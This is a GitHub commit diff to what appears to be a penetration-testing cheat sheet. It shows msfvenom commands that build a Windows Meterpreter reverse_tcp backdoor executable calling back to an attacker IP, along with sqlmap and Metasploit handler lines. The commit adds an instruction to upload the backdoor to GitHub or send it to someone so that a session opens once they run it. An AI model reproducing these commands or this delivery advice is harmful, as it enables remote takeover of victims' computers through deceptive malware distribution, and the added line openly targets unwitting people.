File tree Expand file tree Collapse file tree 1 file changed +3
-2
lines changed Expand file tree Collapse file tree 1 file changed +3
-2
lines changed Original file line number Diff line number Diff line change @@ -35,7 +35,7 @@ sqlmap -r login.req --batch --force-ssl
35
35
-'search.req = info from search bar results using BurpSuite Repeater using 'Copy to File'
36
36
-'login.req = info from login screen using results from BurpSuite Repeater using 'Copy to File'
37
37
===========================================================================================================================
38
- msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.239 -f exe -o payload.exe
38
+ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.141 -f exe -o payload.exe
39
39
===========================================================================================================================
40
40
How to set a WiFi adapter in Monitor Mode:
41
41
ifconfig wlan0 down
@@ -65,13 +65,14 @@ msf exploit(handler) > exploit
65
65
[*] Starting the payload handler…
66
66
===========================================================================================================================
67
67
Creating an executable backdoor with Metasploit:
68
- # msfpayload windows/meterpreter/reverse_tcp lhost=<Listening_IP> lport=<Listening_Port> x > backdoor.exe
69
68
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.239 -f exe -o payload.exe
70
69
71
70
LHOST= Your IP
72
71
RHOST= Target IP
73
72
74
73
The backdoor.exe file is saved in the path where you executed the command.
74
+
75
+ Upload this file to GitHub or send it to someone, once they open it, your meterpreter session will start
75
76
===========================================================================================================================
76
77
77
78
Wireshark Filters:
You can’t perform that action at this time.
0 commit comments